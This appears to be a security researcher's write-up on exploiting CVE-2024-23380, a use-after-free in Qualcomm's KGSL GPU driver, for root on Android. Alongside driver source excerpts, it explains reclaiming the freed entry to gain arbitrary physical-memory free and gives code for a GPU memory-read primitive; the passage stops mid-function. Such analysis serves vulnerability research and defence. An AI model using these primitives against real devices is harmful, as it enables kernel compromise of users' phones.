CVE-2024-23380: GPU KGSL Driver Exploitation Notes



Background



In August 2024, Google’s Android Red Team disclosed a UAF vulnerability in the Qualcomm GPU driver, CVE-2024-23380. With this vulnerability, an attacker can escalate privileges from a normal app to system root. This article provides a detailed analysis of the root cause and the exploitation process of this vulnerability. There is no public exploit for this vulnerability, so here I will share the whole process of exploiting it, from the lowest privilege level to root, including bypassing SELinux.

Consider privilege escalation on Android: AOSP vulnerabilities have already become very difficult to find. In June 2025, the open-source part of AOSP had no new vulnerability reports at all. Although this may reflect an adjustment to Google’s vulnerability bounty and disclosure cadence, it also reflects a trend: the return on AOSP vulnerability hunting keeps getting lower. Does this mean the Android platform is becoming safer and safer?

A normal app runs in the untrusted_app SELinux domain, with privileges even lower than adb shell. It basically cannot access any valuable resources; even if the user is induced to install it, it gains no real privileges. An exploit chain usually needs to first exploit an Android application-layer/framework-layer vulnerability to raise privileges to system (or obtain equivalent capability), then reach the driver interfaces exposed on the vendor/platform side, and finally exploit kernel/driver vulnerabilities to complete privilege escalation to root. This process often relies on multi-stage, composable vulnerabilities: it may involve OEM-customized components (ROM/system services/vendor apps), as well as drivers and firmware provided by the SoC vendor. Because of customization differences among OEMs and differences between the driver stacks of different platforms (Qualcomm/MediaTek), such vulnerability combinations port poorly, and it is difficult to build a general exploit chain. From a security researcher’s perspective, this kind of chain requires long-term investment across components and vendors, yet yields limited reusable results, so the return on investment is low.



In Android, GPU drivers are exposed to the upper layers through the standard graphics stack (such as /dev/kgsl, /dev/mali, and gralloc/ION/DMABUF). In order to ensure that any application has rendering and acceleration capabilities, such device nodes are usually directly accessible to normal applications: without additional permissions, an app can open the device, submit ioctls, allocate/map buffers, and it will not be blocked by SELinux. At the same time, GPU drivers need to implement relatively independent and complex memory allocation and mapping logic; the more complex the interfaces and state machines are, the higher the probability that flaws will be exposed.

This also makes the GPU the most fragile part of the Android security ecosystem. In in-the-wild Android exploits over the past one or two years, attackers have without exception targeted the GPU driver, using GPU driver vulnerabilities to escalate privileges from a normal app to root.

KGSL Memory Model



For GPU driver vulnerability research, a key characteristic we need to pay attention to is that GPU and CPU share the same RAM.

Therefore, the system will simultaneously have two sets of mapping mechanisms of “virtual address → physical address”:

CPU side: The operating system maintains the CPU MMU page table to map process virtual addresses to physical pages.



GPU side: The GPU also has its own MMU/IOMMU (commonly SMMU on ARM platforms). The page tables used by the GPU are created and maintained by the GPU driver (KGSL) in the kernel, used to restrict the range of physical memory that the GPU can access. Taking KGSL as an example, the kernel uses structures such as kgsl_mem_entry / kgsl_memdesc to describe and manage such memory objects and their mapping relationships.

The “addresses” of the two are not the same: the address seen in the application ≠ the address seen on the GPU side; they are just ultimately translated to the same physical page. This mechanism of “two address spaces sharing the same physical page” is the fundamental background of many KGSL mapping-type vulnerabilities.
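To make the “two address spaces, one physical page” idea concrete, here is a toy user-space model in C (not KGSL code). A small array stands in for physical RAM, and two hypothetical page tables of type toy_pagetable, one for the CPU and one for the GPU, map different virtual page numbers to the same physical frame. The 16-byte “pages” and all names are illustrative assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NFRAMES     8      /* toy physical RAM: 8 frames */
#define FRAME_SIZE  16     /* tiny "pages" keep the example readable */
#define PT_ENTRIES  16     /* virtual pages per toy address space */
#define NO_MAPPING  (-1)

static uint8_t phys_mem[NFRAMES][FRAME_SIZE];

/* One page table per address space: virtual page number -> frame number. */
struct toy_pagetable {
	int pte[PT_ENTRIES];
};

static void pt_init(struct toy_pagetable *pt)
{
	for (int i = 0; i < PT_ENTRIES; i++)
		pt->pte[i] = NO_MAPPING;
}

/* Translate a virtual address through one table; NULL if unmapped. */
static uint8_t *translate(const struct toy_pagetable *pt, uint32_t va)
{
	uint32_t vpn = va / FRAME_SIZE;
	uint32_t off = va % FRAME_SIZE;

	if (vpn >= PT_ENTRIES || pt->pte[vpn] == NO_MAPPING)
		return NULL;
	assert(pt->pte[vpn] < NFRAMES);
	return &phys_mem[pt->pte[vpn]][off];
}
```

For example, mapping CPU page 2 and GPU page 9 to frame 5 means a byte written through CPU VA 0x23 is read back through GPU VA 0x93, while GPU VA 0x23 stays unmapped. The two tables are maintained independently, which is why their mapping lifecycles have to be kept in sync by the driver.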



A typical usage flow of shared memory

In real scenarios, the CPU first allocates a piece of physical memory, and then maps it for GPU use: the GPU reads data from shared memory to complete computation/rendering, and writes the result back to the same shared memory, thereby implementing data exchange between CPU ↔ GPU (and between different GPU tasks). This is also an important attack surface for GPU driver security research: the driver must maintain GPU page tables and the mapping lifecycle (allocation, mapping, unmapping, free, permission control, etc.). The flow is complex and involves cooperation among multiple kernel modules; historically, vulnerabilities have occurred many times due to mistakes in mapping/page-table management.



CPU Virtual Memory vs GPU Virtual Memory

Traditional CPUs use virtual memory: the address spaces of different processes are isolated from each other, and the page table stores the mapping relationship from virtual addresses to physical pages. The memory management of the GPU is very similar in concept: different GPU contexts also run in mutually isolated GPU virtual address spaces; the KGSL driver is responsible for maintaining the GPU page table corresponding to each context, and managing GPU memory allocation and release, as well as the shared mapping logic with the CPU.

Taking KGSL as an example: how user space establishes shared mappings

On Qualcomm Adreno platforms, a user-space application interacts with the KGSL kernel driver through ioctls, thereby completing the flow of “allocate shared memory → map to GPU → map to user space”. The typical steps are as follows:

Request GPU-usable memory: The application calls (for example) IOCTL_KGSL_GPUMEM_ALLOC to request allocation; the kernel creates and maintains a memory object (which can be understood as “a piece of physical memory + metadata”), and the corresponding structure is commonly kgsl_mem_entry. For the specific definition, refer to the source code.

Map to the GPU virtual address space: The driver selects a GPU virtual address for a specific GPU context, and establishes a mapping in the GPU page table, configuring the device-side IOMMU/SMMU.

Map to the user-space address space: The application then uses mmap and other methods to map the same physical pages into its own process virtual address space, and reads/writes data using CPU pointers.

Qualcomm GPU Memory Management





Below I will specifically explain the memory management structure on Qualcomm Adreno platforms. The KGSL driver for Adreno abstracts a GPU memory allocation into a “memory object”, and uses two layers of structures to describe it: kgsl_mem_entry (object layer) + kgsl_memdesc (descriptor layer). Together, these record the full lifecycle from “user-space request” to “GPU page-table mapping” and then to “free and reclaim”.

The figure below shows the overall position of KGSL memory objects and mapping relationships:

Key structures: kgsl_mem_entry and kgsl_memdesc

1) kgsl_mem_entry: GPU memory object (high-level representation)

kgsl_mem_entry can be understood as the “object” of a GPU memory allocation on the kernel side:

Each allocation request will create a kgsl_mem_entry instance.

It is responsible for tracking the lifecycle of the object (allocation/mapping/sharing/free).

It provides the object identifier required for user-space interaction (for example, the id needed for subsequent mmap).

Some fields that are more relevant to research:

refcount: object reference count (kref_init / kref_get / kref_put)

id: the identifier of the memory object, unique within the owning process (usually allocated by idr_alloc). User-space interaction with the driver, including subsequent mmap and object lookup, depends on it.

metadata: user-space-controllable metadata (debug tag/mark), which is often a key clue or impact surface in vulnerability analysis.

```c
struct kgsl_mem_entry {
	struct kref refcount;            // reference counter
	struct kgsl_memdesc memdesc;     // contains the kgsl_memdesc structure
	void *priv_data;
	struct rb_node node;
	unsigned int id;                 // obj_id used for user-space interaction
	struct kgsl_process_private *priv;
	int pending_free;
	char metadata[KGSL_GPUOBJ_ALLOC_METADATA_MAX + 1]; // user-controlled metadata
	struct work_struct work;
	atomic_t map_count;
};
```

Among them, refcount deserves special attention.

kgsl_mem_entry uses kref for reference counting:

- kref_init: initialization
- kref_get: increase the reference count
- kref_put: decrease the reference count and trigger the free when it reaches zero

A normal scenario:

When a user-space application (EL0) allocates memory through /dev/kgsl-###, KGSL (EL1) creates a kgsl_mem_entry and sets refcount = 1. If there is sharing (for example, cross-process shared textures/buffers), the sharer holds an additional reference by incrementing refcount, preventing the object from being freed early.

This matters because, as long as refcount > 0, the kernel cannot “forcibly free” the memory object. Reference-counting errors therefore usually lead to two types of risk:

Early free (refcount incorrectly reaches zero): The object is still held/used elsewhere, but is freed → very easy to form UAF (Use-After-Free).

Cannot free (refcount leak): The reference is not decremented back → memory leak, resource exhaustion (DoS direction).
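The kref semantics above can be sketched with a single-threaded stand-in. This is an illustrative model, not the kernel’s struct kref (which uses atomic operations); toy_kref, toy_entry and their helpers are hypothetical names. As with the kernel’s kref_put, the put helper returns 1 when it dropped the last reference and ran the release callback.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct toy_kref {
	int refcount;
};

struct toy_entry {
	int payload;
	struct toy_kref ref;
	bool destroyed;     /* set by the release callback instead of freeing */
};

#define toy_container_of(ptr, type, member) \
	((type *)((char *)(ptr) - offsetof(type, member)))

static void toy_kref_init(struct toy_kref *k) { k->refcount = 1; }
static void toy_kref_get(struct toy_kref *k) { k->refcount++; }

/* Drop one reference; run release() and return 1 if it was the last one. */
static int toy_kref_put(struct toy_kref *k, void (*release)(struct toy_kref *k))
{
	assert(k->refcount > 0);
	if (--k->refcount == 0) {
		release(k);
		return 1;
	}
	return 0;
}

static void toy_entry_release(struct toy_kref *k)
{
	struct toy_entry *e = toy_container_of(k, struct toy_entry, ref);

	e->destroyed = true;   /* a real driver would free the object here */
}
```

An early-free bug corresponds to one put too many: after init plus one get, two puts from the same holder destroy the object while the second holder still keeps its pointer, which is the UAF pattern described above.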

2) kgsl_memdesc: memory descriptor (low-level representation)

kgsl_memdesc is the layer closer to hardware and page tables, and mainly includes:

The actual physical pages / sg_table information

The association between GPU virtual address (gpuaddr) and physical address (physaddr)

Fields such as memory type, cache attributes, and mapping attributes that affect hardware access behavior

The binding relationship with the GPU page table (pagetable)

struct kgsl_memdesc {

struct kgsl_pagetable *pagetable;

void *hostptr;

unsigned int hostptr_count;

uint64_t gpuaddr;

phys_addr_t physaddr;

uint64_t size;

unsigned int priv;

struct sg_table *sgt;

const struct kgsl_memdesc_ops *ops;

uint64_t flags;

struct device *dev;

unsigned long attrs;

struct page **pages;

unsigned int page_count;

spinlock_t lock;

struct file *shmem_filp;



struct rb_root_cached ranges;

struct mutex ranges_lock;

u32 gmuaddr;

};Key fields of kgsl_memdesc

- pagetable: points to the GPU page table structure, which defines the GPU context/address space the object belongs to. It is what backs the mapping of GPU VA (gpuaddr) → physical pages (pages/physaddr).
- gpuaddr: the GPU-visible virtual address (GPU VA). It is allocated by KGSL’s mapping management logic and is not a user-space pointer.
- pages/page_count/sgt/physaddr: which physical pages the object consists of.
  - pages/page_count: the page array and its length (for non-contiguous physical memory).
  - sgt: scatter-gather table, used to describe a set of discrete physical pages (commonly used for DMA/IOMMU mappings).
  - physaddr: sometimes stores the base physical address (more common for contiguous allocations or specific backends). During analysis, note whether it or pages/sgt is the “ground truth”.
- hostptr: kernel-space virtual address mapping (EL1), letting the driver read/write this memory directly on the CPU. It is related to the user-space mmap CPU view: user space accesses the memory through process virtual addresses, and the same physical page may also be mapped in kernel space.
- size/flags/attrs: size is the allocation size (usually page-aligned); flags/attrs hold cache attributes, access permissions, mapping behavior, etc.
- ops: defines methods for specific functionality or interface operations. ops provides a degree of “polymorphism”, allowing different memory descriptors to implement different sets of operations; for example, different memory management strategies or backends may have different memory operation functions.
- ranges: struct rb_root_cached ranges; is the root of a tree of kgsl_memdesc_bind_range nodes (an interval tree implemented on a red-black tree), used to track bindings in the GPU virtual address space (GPU VA):
  - an interval [range.start, range.last] represents a segment of the target’s GPU VA;
  - range->entry points to the child kgsl_mem_entry that this segment of VA is currently bound to.

KGSL low-level logic analysis

Exploitation is closely related to KGSL memory allocation, so it is necessary to analyze it from the code level.

Regarding memory reference counting, the functions kgsl_mem_entry_get/put are used, i.e., incrementing and decrementing the reference count (kref) of kgsl_mem_entry to control the object lifecycle: whoever is using this entry should “get”; when it is no longer used, “put”. Only when the last put decrements the count to 0 will actual destruction be triggered.

kgsl_mem_entry_get(entry): increment reference count +1, ensuring the object will not be freed while you are using it.

kgsl_mem_entry_put(entry): decrement the reference count by 1; if it becomes 0, kgsl_mem_entry_destroy is called to release the related resources.

kgsl_ioctl is the entry point for KGSL ioctls and dispatches each command to its handler; the allocation handlers it reaches are what create kgsl_mem_entry and kgsl_memdesc. Let’s quickly go through it to get familiar.

```c
long kgsl_ioctl(struct file *filep, unsigned int cmd, unsigned long arg)
{
	struct kgsl_device_private *dev_priv = filep->private_data;
	struct kgsl_device *device = dev_priv->device;
	long ret;

	ret = kgsl_ioctl_helper(filep, cmd, arg, kgsl_ioctl_funcs,
		ARRAY_SIZE(kgsl_ioctl_funcs));

	/*
	 * If the command was unrecognized in the generic core, try the device
	 * specific function
	 */
	if (ret == -ENOIOCTLCMD) {
		if (is_compat_task() && device->ftbl->compat_ioctl != NULL)
			return device->ftbl->compat_ioctl(dev_priv, cmd, arg);
		else if (device->ftbl->ioctl != NULL)
			return device->ftbl->ioctl(dev_priv, cmd, arg);

		KGSL_DRV_INFO(device, "invalid ioctl code 0x%08X\n", cmd);
	}

	return ret;
}
```

Supported CMDs:

```c
static const struct kgsl_ioctl kgsl_ioctl_funcs[] = {
	KGSL_IOCTL_FUNC(IOCTL_KGSL_DEVICE_GETPROPERTY,
			kgsl_ioctl_device_getproperty),
	/* IOCTL_KGSL_DEVICE_WAITTIMESTAMP is no longer supported */
	KGSL_IOCTL_FUNC(IOCTL_KGSL_DEVICE_WAITTIMESTAMP_CTXTID,
			kgsl_ioctl_device_waittimestamp_ctxtid),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_RINGBUFFER_ISSUEIBCMDS,
			kgsl_ioctl_rb_issueibcmds),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_SUBMIT_COMMANDS,
			kgsl_ioctl_submit_commands),
	/* IOCTL_KGSL_CMDSTREAM_READTIMESTAMP is no longer supported */
	KGSL_IOCTL_FUNC(IOCTL_KGSL_CMDSTREAM_READTIMESTAMP_CTXTID,
			kgsl_ioctl_cmdstream_readtimestamp_ctxtid),
	/* IOCTL_KGSL_CMDSTREAM_FREEMEMONTIMESTAMP is no longer supported */
	KGSL_IOCTL_FUNC(IOCTL_KGSL_CMDSTREAM_FREEMEMONTIMESTAMP_CTXTID,
			kgsl_ioctl_cmdstream_freememontimestamp_ctxtid),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_DRAWCTXT_CREATE,
			kgsl_ioctl_drawctxt_create),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_DRAWCTXT_DESTROY,
			kgsl_ioctl_drawctxt_destroy),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_MAP_USER_MEM,
			kgsl_ioctl_map_user_mem),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_SHARED_MEM_FREE,
			kgsl_ioctl_shared_mem_free),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_SHARED_MEM_FLUSH_CACHE,
			kgsl_ioctl_shared_mem_flush_cache),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUMEM_ALLOC,
			kgsl_ioctl_gpumem_alloc),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_CFF_SYNCMEM,
			kgsl_ioctl_cff_syncmem),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_CFF_USER_EVENT,
			kgsl_ioctl_cff_user_event),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_TIMESTAMP_EVENT,
			kgsl_ioctl_timestamp_event),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_SETPROPERTY,
			kgsl_ioctl_setproperty),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUMEM_ALLOC_ID,
			kgsl_ioctl_gpumem_alloc_id),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUMEM_FREE_ID,
			kgsl_ioctl_gpumem_free_id),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUMEM_GET_INFO,
			kgsl_ioctl_gpumem_get_info),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUMEM_SYNC_CACHE,
			kgsl_ioctl_gpumem_sync_cache),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUMEM_SYNC_CACHE_BULK,
			kgsl_ioctl_gpumem_sync_cache_bulk),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_SYNCSOURCE_CREATE,
			kgsl_ioctl_syncsource_create),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_SYNCSOURCE_DESTROY,
			kgsl_ioctl_syncsource_destroy),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE,
			kgsl_ioctl_syncsource_create_fence),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_SYNCSOURCE_SIGNAL_FENCE,
			kgsl_ioctl_syncsource_signal_fence),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_CFF_SYNC_GPUOBJ,
			kgsl_ioctl_cff_sync_gpuobj),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUOBJ_ALLOC,
			kgsl_ioctl_gpuobj_alloc),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUOBJ_FREE,
			kgsl_ioctl_gpuobj_free),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUOBJ_INFO,
			kgsl_ioctl_gpuobj_info),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUOBJ_IMPORT,
			kgsl_ioctl_gpuobj_import),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUOBJ_SYNC,
			kgsl_ioctl_gpuobj_sync),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPU_COMMAND,
			kgsl_ioctl_gpu_command),
	KGSL_IOCTL_FUNC(IOCTL_KGSL_GPUOBJ_SET_INFO,
			kgsl_ioctl_gpuobj_set_info),
};
```

IOCTL_KGSL_GPUOBJ_ALLOC triggers the gpuobj allocation path and eventually calls kgsl_ioctl_gpuobj_alloc.

At a high level, this IOCTL creates a GPU object and allocates kernel heap memory (via kzalloc) for the corresponding kgsl_mem_entry.

```c
static long kgsl_ioctl_gpuobj_alloc(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
	struct kgsl_gpuobj_alloc *param = data;
	struct kgsl_process_private *private = dev_priv->process_priv;
	struct kgsl_mem_entry *entry;
	long ret;

	entry = kgsl_mem_entry_create();
	if (entry == NULL)
		return -ENOMEM;

	ret = kgsl_memdesc_init(private->pagetable, &entry->memdesc,
		private->pagetable->name);
	if (ret)
		goto err;

	ret = kgsl_allocate_user(private->pagetable, &entry->memdesc,
		param->flags, param->size, &entry->priv_data);
	if (ret)
		goto err;

	ret = kgsl_mem_entry_attach_process(private, entry);
	if (ret)
		goto err;

	param->id = entry->id;
	param->gpuaddr = entry->memdesc.gpuaddr;
	param->flags = entry->memdesc.flags;

	return 0;

err:
	kgsl_mem_entry_put(entry);
	return ret;
}
```

One important detail here is the initial refcounting of the entry.

The call chain eventually reaches kgsl_mem_entry_create, which sets up the kref:

- kref_init(&entry->refcount) initializes refcount to 1.
- kref_get(&entry->refcount) immediately increments it again, holding an extra reference for the user-space alloc/map ioctl paths.

```c
static struct kgsl_mem_entry *kgsl_mem_entry_create(void)
{
	struct kgsl_mem_entry *entry = kzalloc(sizeof(*entry), GFP_KERNEL);

	if (entry != NULL) {
		kref_init(&entry->refcount); // init refcount = 1
		/* put this ref in userspace memory alloc and map ioctls */
		kref_get(&entry->refcount); // refcount++
		atomic_set(&entry->map_count, 0);
	}

	return entry;
}
```

Then, inside kgsl_allocate_user, entry->memdesc.ops is set.

If the user uses flags such as KGSL_MEMFLAGS_USE_CPU_MAP, entry->memdesc.ops will be set to kgsl_page_ops.

CMD: IOCTL_KGSL_GPUOBJ_FREE

Freeing a KGSL GPU object depends on two factors:

- Whether the IOCTL takes the “free immediately” path or the “deferred free” path (controlled by flags/type).
- Even if it takes a free path, whether the object is actually destroyed at that moment is determined by the kref reference count.
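The reference counting along the immediate-free path can be traced with a small model. It is a sketch, not driver code, and it rests on two assumptions read off the code in this section: the alloc ioctl drops the extra reference taken in kgsl_mem_entry_create once the entry is committed (as the “put this ref in userspace memory alloc and map ioctls” comment indicates), and kgsl_sharedmem_find_id returns the entry with a reference held, which is why kgsl_ioctl_gpuobj_free ends with its own kgsl_mem_entry_put. The model_* names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>

struct model_entry {
	int refcount;
	bool pending_free;   /* plays the role of kgsl_mem_entry_set_pend() */
	bool destroyed;      /* stands in for kgsl_mem_entry_destroy() having run */
};

static void model_get(struct model_entry *e)
{
	assert(!e->destroyed);
	e->refcount++;
}

static void model_put(struct model_entry *e)
{
	assert(e->refcount > 0);
	if (--e->refcount == 0)
		e->destroyed = true;
}

/* kgsl_mem_entry_create(): kref_init (1) + kref_get (2). */
static void model_create(struct model_entry *e)
{
	*e = (struct model_entry){ .refcount = 2 };
}

/* Assumed end of the alloc ioctl: drop the extra creation reference. */
static void model_alloc_done(struct model_entry *e)
{
	model_put(e);
}

/* Immediate-free path of kgsl_ioctl_gpuobj_free(); returns 0 or -1 (-EBUSY). */
static int model_gpuobj_free(struct model_entry *e)
{
	int ret = 0;

	model_get(e);                /* kgsl_sharedmem_find_id() */
	if (e->pending_free) {       /* kgsl_mem_entry_set_pend() failed */
		ret = -1;
	} else {
		e->pending_free = true;
		model_put(e);            /* put inside gpumem_free_entry() */
	}
	model_put(e);                /* final put in the ioctl */
	return ret;
}
```

With a single owner, the free ioctl takes the count 1 → 2 → 1 → 0 and destroys the entry. If another holder (for example a VBO bind range) still owns a reference, the same ioctl only marks the entry pending and leaves refcount at 1; destruction waits for that holder’s put.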

```c
long kgsl_ioctl_gpuobj_free(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
	struct kgsl_gpuobj_free *param = data;
	struct kgsl_process_private *private = dev_priv->process_priv;
	struct kgsl_mem_entry *entry;
	long ret;

	entry = kgsl_sharedmem_find_id(private, param->id); // validate id belongs to this process
	if (entry == NULL)
		return -EINVAL;

	/* If no event is specified then free immediately */
	if (!(param->flags & KGSL_GPUOBJ_FREE_ON_EVENT))
		ret = gpumem_free_entry(entry); // free immediately
	else if (param->type == KGSL_GPU_EVENT_TIMESTAMP)
		ret = gpuobj_free_on_timestamp(dev_priv, entry, param);
	else if (param->type == KGSL_GPU_EVENT_FENCE)
		ret = gpuobj_free_on_fence(dev_priv, entry, param);
	else
		ret = -EINVAL;

	kgsl_mem_entry_put(entry);
	return ret;
}
```

gpumem_free_entry is the direct free routine, and it eventually calls kgsl_mem_entry_put:

```c
long gpumem_free_entry(struct kgsl_mem_entry *entry)
{
	if (!kgsl_mem_entry_set_pend(entry))
		return -EBUSY;

	trace_kgsl_mem_free(entry);
	kgsl_memfree_add(pid_nr(entry->priv->pid),
		entry->memdesc.pagetable ?
			entry->memdesc.pagetable->name : 0,
		entry->memdesc.gpuaddr, entry->memdesc.size,
		entry->memdesc.flags);

	kgsl_mem_entry_put(entry);
	return 0;
}
```

Going back to the allocation side, kgsl_allocate_user is where memdesc->ops is selected:

```c
int kgsl_allocate_user(struct kgsl_pagetable *pagetable,
		struct kgsl_memdesc *memdesc,
		uint64_t flags,
		size_t size,
		void **priv)
{
	...
	if (KGSL_MEMFLAGS_USE_CPU_MAP & flags) {
		memdesc->ops = &kgsl_page_ops;
		memdesc->flags |= KGSL_MEMFLAGS_USE_CPU_MAP;
		...
	}
	...
}
```

Then, in kgsl_page_alloc, memdesc->physaddr and memdesc->size are filled in.

```c
int kgsl_page_alloc(struct kgsl_memdesc *memdesc, u64 size,
		unsigned int align)
{
	...
	memdesc->size = size;
	memdesc->physaddr = page_to_phys(page);
	...
}
```

When freeing, because memdesc->ops is kgsl_page_ops at this point, kgsl_page_free is called.

```c
void kgsl_page_free(struct kgsl_memdesc *memdesc)
{
	...
	if (memdesc->page_count != 0)
		kgsl_free_pages_from_sgt(memdesc);
	...
}
```

kgsl_free_pages_from_sgt uses memdesc->size to determine the number of pages to free.
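The page count comes from PAGE_ALIGN(memdesc->size) >> PAGE_SHIFT: the size is rounded up to a whole page and then converted to a number of pages. A minimal sketch of just that arithmetic, assuming 4 KiB pages (PAGE_SHIFT = 12); the TOY_ macros are stand-ins for the kernel’s own.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_PAGE_SHIFT 12                                  /* assumes 4 KiB pages */
#define TOY_PAGE_SIZE  (UINT64_C(1) << TOY_PAGE_SHIFT)
#define TOY_PAGE_ALIGN(x) (((x) + TOY_PAGE_SIZE - 1) & ~(TOY_PAGE_SIZE - 1))

/* Same computation as: npages = PAGE_ALIGN(memdesc->size) >> PAGE_SHIFT; */
static uint64_t pages_for_size(uint64_t size)
{
	return TOY_PAGE_ALIGN(size) >> TOY_PAGE_SHIFT;
}
```

For example, a size of 0x1001 bytes rounds up to 0x2000 and yields 2 pages, while 0x10000 yields 16.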

```c
void kgsl_free_pages_from_sgt(struct kgsl_memdesc *memdesc)
{
	int i;
	struct scatterlist *sg;
	struct sg_table *sgt = memdesc->sgt;
	int npages = PAGE_ALIGN(memdesc->size) >> PAGE_SHIFT;
	...
	for_each_sg(sgt->sgl, sg, sgt->nents, i) {
		int j;

		for (j = 0; j < sg->length >> PAGE_SHIFT; j++)
			if (memdesc->pages != NULL)
				__free_page(memdesc->pages[npages++]);
			else
				__free_page(nth_page(sg_page(sg), j));
	}
	...
}
```

So here’s the key point:

We can control the UAF kgsl_mem_entry, and therefore memdesc->physaddr and memdesc->size. By tampering with memdesc->ops to point to kgsl_contiguous_ops, the free logic switches to kgsl_contiguous_free. kgsl_contiguous_free calls dma_free_attrs, which frees a contiguous physical memory range starting at memdesc->physaddr with size memdesc->size.

This provides an important capability: we can arbitrarily free physical memory.

Therefore, to do exploitation, what we need to do is: in a UAF scenario, occupy kgsl_mem_entry and modify memdesc->physaddr and memdesc->size.

Then by freeing the object from the user-space interface, it will end up calling dma_free_attrs and freeing the corresponding physical range.

GPU Development Basics

Normally, GPU drivers provide user-space libraries for GL/Vulkan etc. for calling and packaging low-level ioctls.

But in order to do exploitation, we may need to directly access the kernel interface (/dev/kgsl-3d0) and implement our own operations, and even implement some “GPU instruction level” primitives to make the GPU help us read/write memory.

This involves the compilation and usage of the Adreno SDK.

Build and Use the Adreno SDK

According to the Adreno SDK documentation, the Adreno SDK can be built with the NDK.

I downloaded and installed the NDK, and used the following commands to compile it:

```shell
export ANDROID_NDK_PATH=/root/android-ndk-r20b
cmake -S . -B build -DANDROID_ABI=arm64-v8a -DCMAKE_BUILD_TYPE=Release -DCMAKE_TOOLCHAIN_FILE=$ANDROID_NDK_PATH/build/cmake/android.toolchain.cmake -DANDROID_PLATFORM=android-30
cmake --build build
```

The path of the built libadreno_utils.so is:

```
AdrenoSDKVulkan/build/output/jni/arm64-v8a/libadreno_utils.so
```

Then use it directly and compile with:

```shell
./compile.sh
```

The usage is quite simple:

```shell
adb push libadreno_utils.so /data/local/tmp/
adb push test /data/local/tmp/
```

Then execute on the device:

```shell
cd /data/local/tmp/
./test
```

Basic Adreno Graphics Data Structures

Adreno’s command submission logic is: user space constructs IB (instruction buffer / command buffer), and submits it to the driver via ioctl; the driver passes it to the firmware/GMU; and the GPU parses/executes.

Some important structures:

- kgsl_command_object: describes a submission, including its list of kgsl_cmd_syncpoints, and its kgsl_command_object itself.
- kgsl_command_syncpoint: used to specify dependency objects, such as fences or timestamps.
- kgsl_command_ibdesc: describes the memory range of the instruction buffer.

When we call IOCTL_KGSL_GPU_COMMAND, it expects us to pass struct kgsl_gpu_command from user space.

```c
struct kgsl_gpu_command {
	__u64 flags;
	__u64 cmdlist;      // points to user-space cmd buffer
	__u64 cmdsize;
	__u64 objlist;      // points to object list
	__u64 objsize;
	__u64 synclist;     // points to sync list
	__u64 syncsize;
	__u64 context_id;
	__u32 timestamp;
};
```

Then, from the ioctl implementation, you can see:

- cmdlist corresponds to an array of ibdesc

- objlist corresponds to an array of cmdobj

- synclist corresponds to an array of syncpoints

```c
static long kgsl_ioctl_gpu_command(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
	struct kgsl_gpu_command *param = data;
	struct kgsl_drawobj_cmd *cmdobj = NULL;
	struct kgsl_drawobj_sync *syncobj = NULL;
	struct kgsl_command_object *obj;
	struct kgsl_drawobj *drawobj;
	long result = -EINVAL;
	...
	result = kgsl_cmdlist_create(dev_priv, param, &drawobj, &cmdobj, &syncobj);
	...
}
```

GPU Read/Write Primitives

How do we implement a GPU read primitive?

- Find a GPU memory region whose contents the CPU can read back (e.g., cmd_buffer).
- Use the GPU command CP_MEM_TO_MEM to copy the data at the target address into this region.
- Use CP_MEM_WRITE to write a marker value, so the CPU can poll for completion.

For the command packet format, refer to kgsl’s cp_packet.h.

Memory read example code (copies 8 bytes per loop iteration):

```c
// Reads `count` 8-byte words starting at GPU VA `addr` into `results`.
// Relies on globals/helpers defined elsewhere: fd, drawctxt_id,
// cmd_buffer (CPU mapping), cmd_buffer_gpu_addr (its GPU VA),
// cp_type7_packet(), cp_gpuaddr() and kgsl_gpu_command_n().
static int gpu_readall(uint64_t addr, size_t count, void *results)
{
	assert(count <= 0x3000);
	const uint32_t magic = rand();
	size_t offset_scratch = 0x10;                        // command stream
	size_t offset_ret = offset_scratch + 0xd0000;        // completion marker
	size_t offset_value = offset_scratch + 0xd0000 + 8;  // copied data
	uint32_t *cmds_start = (uint32_t *)(cmd_buffer + offset_scratch);
	uint32_t *cmds = cmds_start;

	for (size_t i = 0; i < count; i++) {
		// Low 32 bits of the i-th word
		*cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
		*cmds++ = 0;
		cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_value + i * 8);
		cmds += cp_gpuaddr(cmds, addr + i * 8);
		// High 32 bits of the i-th word
		*cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
		*cmds++ = 0;
		cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_value + i * 8 + 4);
		cmds += cp_gpuaddr(cmds, addr + i * 8 + 4);
	}

	// Signal completion by writing the magic value
